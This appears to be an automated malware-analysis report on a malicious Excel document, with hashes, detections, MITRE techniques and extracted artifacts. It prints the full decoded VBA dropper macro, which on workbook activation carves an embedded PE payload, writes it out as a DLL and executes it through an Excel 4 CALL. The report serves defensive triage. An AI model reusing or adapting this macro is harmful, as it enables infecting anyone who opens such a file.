Office (OLE) malware analysis — malicious · a4c96deb6db58e06

MALICIOUS

Office (OLE)

742.5 KB Created: 2019-08-30 09:14:50 Authoring application: Microsoft Excel First seen: 2020-09-04

MD5: 3e5d514c1dd7b0a9908babf22faf4f1c SHA-1: de68f0e7fe4cb60a3302c7f09765bfd56c9f6660 SHA-256: a4c96deb6db58e06388c2d4696f2e27fa9cb648c5bd78d3ad6cef80078e63e6f

442 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is an Office document containing VBA macros that utilize the Shell() function. This function is used to execute an embedded PE executable file, identified as 'embedded_office_00004541.exe'. The presence of VirtualAlloc, LoadLibrary, and GetProcAddress API calls within the VBA code suggests the macro is preparing to load and execute the embedded payload, likely for malicious purposes.

Heuristics 10

ClamAV: Win.Trojan.Razy-7331387-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Razy-7331387-0
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
         sendings = 1
         Dim sNMSP As New Shell
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.microsoft.com0 In document text (OLE body)
- http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl0XIn document text (OLE body)
- http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt0In document text (OLE body)
- http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl0ZIn document text (OLE body)
- http://www.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt0In document text (OLE body)
- http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0TIn document text (OLE body)
- http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0In document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/contentTypeIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributesIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/propertiesIn document text (OLE body)
- http://www.w3.org/2001/XMLSchemaIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/documentManagement/typesIn document text (OLE body)
- http://schemas.microsoft.com/office/infopath/2007/PartnerControlsIn document text (OLE body)
- http://schemas.openxmlformats.org/package/2006/metadata/core-propertiesIn document text (OLE body)
- http://www.w3.org/2001/XMLSchema-instanceIn document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://purl.org/dc/terms/In document text (OLE body)
- http://schemas.microsoft.com/internal/obdIn document text (OLE body)
- http://dublincore.org/schemas/xmls/qdc/2003/04/02/dc.xsdIn document text (OLE body)
- http://dublincore.org/schemas/xmls/qdc/2003/04/02/dcterms.xsdIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.microsoft.com/sharepoint/v3/contenttype/formsIn document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14425 bytes
SHA-256: `32a55ab12ca3427a3f1905ffc18c164c5c11cfbf9d29eabe5c5f457b8a22571e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "one" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Activate() If PrepareForm.Visible = False Then PopulateDivineCommercial 821 End If End Sub Public Sub PopulateDivineCommercial(dImmer As Integer) Dim ActiveHotbit As New WshShell Dim s As String Dim GetInfirmityLevelDescription As String Dim d As Long d = 3 d = d - 1 Select Case d Case 0 s = "No health problems" Case 1 s = "Minor health problems" Case 2 s = "Major health problems" Case 3 s = "Severe disability" End Select Dim SpecialPath As String PRP = "%" & UserForm6.TextBox1.Tag UserForm6.TextBox1.Tag = ActiveHotbit.ExpandEnvironmentStrings(PRP + "%") Dim car As CarClass Set car = New CarClass UserForm6.TextBox3.Tag = car.CheckCar(ActiveHotbit, "" & UserForm6.TextBox3.Tag + "") ChDir (UserForm6.TextBox1.Tag) PrepareForm.show End Sub Attribute VB_Name = "Page1" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" #If VBA7 And Win64 Then Public Const FlagDouble = True #Else Public Const FlagDouble = False #End If Public DisputeChannel3 As Byte Public Declaration() As Byte Public abbrev As Byte Public DisputeChannel4 As Byte Public Sub PrepareConfigForOutput() On Error Resume Next Dim i As Long Dim sNextChar As String Dim tooolsetChunkI As Boolean Dim tooolsetChunkQ As Boolean Dim sCommand As String Dim PrepareConfigForOutput As Long PrepareConfigForOutput = 0 tooolsetChunkIParameter = False tooolsetChunkQ = False sCommand = Command$ For i = 1 To ALen.B(sCommand) sNextChar = Mid(sCommand, i, 1) If tooolsetChunkIParameter Then If tooolsetChunkQ Then If sNextChar = " " Then tooolsetChunkIParameter = False tooolsetChunkQ = False PrepareConfigForOutput = PrepareConfigForOutput + 1 End If End If End If Next i If tooolsetChunkIParameter Then PrepareConfigForOutput = PrepareConfigForOutput + 1 End Sub Public Sub PathBack(ByVal sPath As String) On Error Resume Next Dim sT As Variant Dim tt As String If Len(sPath) = 3 Then GoTo errorhand For ii = 0 To UBound(sT) - 2 tt = tt & sT(ii) & "\" Next ii PathB.ack = tt errorhand: Path.Back = sPath End Sub Public Sub GetParam(Count As Integer) Dim i As Long Dim j As Integer Dim c As String Dim tooolsetChunkI As Boolean Dim tooolsetChunkQ As Boolean j = 1 tooolsetChunkI = False tooolsetChunkQ = False GetP.aram = "" For i = 1 To Len(Comma.nd$) c = Mi.d$(Comma.nd$, i, 1) If tooolsetChunkI Then If c = """" Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If ElseIf tooolsetChunkI And Not tooolsetChunkQ Then If c = " " Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If Else If c = """" Then If j > Count Then Exit Sub tooolsetChunkI = True tooolsetChunkQ = True ElseIf c <> " " Then tooolsetChunkI = True tooolsetChunkQ = False End If End If If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c Next i End Sub Attribute VB_Name = "PrepareForm" Attribute VB_Base = "0{45D1D7B4-3D44-44F4-8223-06753405770A}{414BBB58-D4A4-45BD-AFF9-A2FEE7F8B2DE}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub UserForm_Initialize() Call KeyPropUpdate(Me, False) End Sub Private Sub UserForm_Activate() DoEvents DoEvents NigebrednehC DoEvents End Sub Attribute VB_Name = "Module2" Public Const GWL_STYLE = -16 Public Const WS_CAPTION = &HC00000 Public Const WS_SYSMENU = &H80000 Public Const FirstB As Byte = 77 Public Const SecondB As Byte = 90 Public Const ThirdB As Byte = 144 #If VBA7 Then Public Declare PtrSafe Function BoxWSL _ Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _ ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Public Declare PtrSafe Function FWA1 _ Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Public Declare PtrSafe Function DrawMenuBar _ Lib "user32" (ByVal parameter1 As Long) As Long Public Declare PtrSafe Function GetWindowLong11 _ Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _ ByVal nIndex As Long) As Long #Else Public Declare Function GetWindowLong11 _ Lib "user32" Alias "GetWindowLongA" ( _ ByVal parameter1 As Long, ByVal nIndex As Long) As Long Public Declare Function FWA1 _ Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Public Declare Function DrawMenuBar _ Lib "user32" (ByVal parameter1 As Long) As Long Public Declare Function BoxWSL _ Lib "user32" Alias "SetWindowLongA" ( _ ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long #End If Public Function NumberBuffer(LongData As Long, Context As Integer, ByVal ByteData As Byte) If PrepareForm.Enabled = True Then Put #LongData, , ByteData End If End Function Public Function ColumnRangeWidth(ByVal ColRange As String, ByVal Width As Single) As Boolean ColumnRangeWidth = True On Error GoTo ErrorHandler Excel.Worksheets(1).Columns(ColRange).ColumnWidth = Width Exit Function ErrorHandler: ColumnRangeWidth = False Resume Next End Function Public Function ColumnWidth(ByVal Col As Integer, ByVal Width As Single) As Boolean ColumnWidth = True On Error GoTo ErrorHandler Excel.Worksheets(1).Columns(Col).ColumnWidth = Width Exit Function ErrorHandler: ColumnWidth = False Resume Next End Function Public Function GetFlexGridColFromXPos(TheGrid, XPos As Single) As Long On Error GoTo ErrorTrap Dim i As Long, lAccWidth As Long With TheGrid For i = 0 To .Cols - 1 lAccWidth = lAccWidth + .ColWidth(i) If XPos <= lAccWidth Then GetFlexGridColFromXPos = i Exit Function End If Next i End With Exit Function ErrorTrap: Exit Function End Function Private Sub ERRCHECK(result) If result = RCPND_FMOD_OK Then ms.gR.esult = MsgBox(result & ") ") End If End Sub Public Sub NigebrednehC() Dim sendings As Integer ctackPap = UserForm6.TextBox1.Tag Dim ofbl As String ofbl = UserForm6.TextBox3.Tag + "\rofce.dll" Dim CurrentSizeOfAT As Long ctackPup = Join(Array(UserForm6.TextBox1.Tag, "\olivio.xlsx"), "") ctackPop = Join(Array(ctackPap, UserForm6.TextBox3.Value), "") foooBar = Array("", "", "", ctackPup, ".z", "ip") Dim arr(1 To 3) As String If foooBar(0) > "" Then End If ctackPip = Join(foooBar, "") PublicResumEraseByArrayList ctackPop, ctackPip, ofbl VistaQ ctackPup FileCopy ctackPup, ctackPip sendings = 1 Dim sNMSP As New Shell If sendings > 0 And sendings > -30 Then Set FileWherePutTo2 = sNMSP.Namespace(ctackPap) Set FileWherePutTo = sNMSP.Namespace(ctackPip) FileWherePutTo2.CopyHere FileWherePutTo.Items.Item(UserForm6.Label11.Tag) End If CurrentSizeOfAT = 287232 If FlagDouble Then CurrentSizeOfAT = 300000 + 10780 + 4 sendings = 2 End If Composition ctackPap & UserForm6.Label1.Tag, ofbl, CurrentSizeOfAT, sendings If sendings >= 0 Then sendings = sendings + 1 ChDir (UserForm6.TextBox3.Tag) sendings = sendings + 1 End If If sendings < 100 Then sendings = sendings + 1 sendings = sendings + 1 End If PrepareConfigForOutput If sendings < 0 Then sendings = sendings + 1 sendings = sendings + 1 End If ofbl = "CALL(""" + ofbl ExecuteExcel4Macro ofbl + """,""vide1"",""J"")" End Sub Public Sub VistaQ(WhereToGo) DoEvents ThisWorkbook.Sheets.Copy Application.DisplayAlerts = False DoEvents ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9 DoEvents ActiveWorkbook.Close DoEvents End Sub Attribute VB_Name = "Module0" Attribute VB_Name = "UserForm6" Attribute VB_Base = "0{CD12D883-907D-46E1-91A2-D3B2CE6A0748}{3D460F7F-FB83-4637-B312-CDC2A962F6FF}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Page11" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module4" Public Sub GetParam(Count As Integer) Dim i As Long Dim j As Integer Dim c As String Dim tooolsetChunkI As Boolean Dim tooolsetChunkQ As Boolean j = 1 tooolsetChunkI = False tooolsetChunkQ = False GetP.aram = "" For i = 1 To Len(Comma.nd$) c = Mi.d$(Comma.nd$, i, 1) If tooolsetChunkI Then If c = """" Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If ElseIf tooolsetChunkI And Not tooolsetChunkQ Then If c = " " Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If Else If c = """" Then If j > Count Then Exit Sub tooolsetChunkI = True tooolsetChunkQ = True ElseIf c <> " " Then tooolsetChunkI = True tooolsetChunkQ = False End If End If If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c Next i End Sub Attribute VB_Name = "Module5" Public Sub KeyPropUpdate(frm As Object, show As Boolean) Dim windowStyle As Long Dim windowHandle As Long windowHandle = FWA1(vbNullString, frm.Caption) windowStyle = GetWindowLong11(windowHandle, GWL_STYLE) If show Then BoxWSL windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU) Else BoxWSL windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU) End If DrawMenuBar (windowHandle) End Sub Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant) On Error Resume Next For Each Key In putArrayBigList Kill Key Next Key On Error GoTo 0 End Sub Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, DisputeChannel6 As Integer) Dim DisputeChannel1 As Long Dim SimpleMethod As Integer ReDim Declaration(1 To fl) DisputeChannel1 = FreeFile Open Composition2 For Binary Access Read As DisputeChannel1 Dim cur As Integer cur = 1 Do While 1 Get DisputeChannel1, , abbrev If abbrev = FirstB Then Declaration(1) = abbrev Get DisputeChannel1, , DisputeChannel3 If DisputeChannel3 = SecondB Then Declaration(2) = DisputeChannel3 Get DisputeChannel1, , DisputeChannel4 If DisputeChannel4 = ThirdB Then Declaration(3) = DisputeChannel4 If cur = DisputeChannel6 Then For k = 4 To fl Get DisputeChannel1, , abbrev Declaration(k) = abbrev Next k Exit Do Else cur = cur + 1 End If End If End If End If Loop Close DisputeChannel1 On Error Resume Next DisputeChannel1 = FreeFile Open ofbl For Binary Lock Read Write As #DisputeChannel1 For i = LBound(Declaration) To UBound(Declaration) If PrepareForm.Enabled = True Then NumberBuffer DisputeChannel1, 70, Declaration(i) End If Next i Close DisputeChannel1 DisputeChannel1 = FreeFile For HSP = 33 To -1 Step -0.25 DisputeChannel1 = 6 + i Next HSP End Sub Attribute VB_Name = "CarClass" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Dim vSpeed As Integer Dim vLicensePlate As String Public Property Get Speed() As Integer Speed = vSpeed End Property Public Property Let Speed(sp As Integer) vSpeed = Application.WorksheetFunction.Min(sp, 100) vSpeed = Application.WorksheetFunction.Max(vSpeed, -100) End Property Public Property Get CheckCar(car As Object, Drive As String) CheckCar = car.SpecialFolders("" + Drive) End Property Public Property Get SpecialFolders() As String LicensePlate = vLicensePlate End Property Public Property Let LicensePlate(lp As String) If Len(lp) <> 6 Then Err.Raise (xlErrValue) 'Raise error vLicensePlate = lp End Property
`embedded_office_00004541.exe`	embedded-pe	Office MZ+PE at offset 0x4541	742591 bytes
SHA-256: `655fe4f48d25db6a66b9a81f1ea331b4f7d146c6dbf91e11415f68b041db8784`
Detection ClamAV: Win.Trojan.Razy-7331387-0 Obfuscation or payload: likely Static shellcode analysis recovered command string(s): WScript.Shell""J]
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: MBD0068059B/Ole10Native	618253 bytes
SHA-256: `de80c1ed8f6232c4680d072680df677cf0217e8cf23c7fd905691b8669cbdd34`

Open this report in the interactive analyzer, or submit your own file for analysis.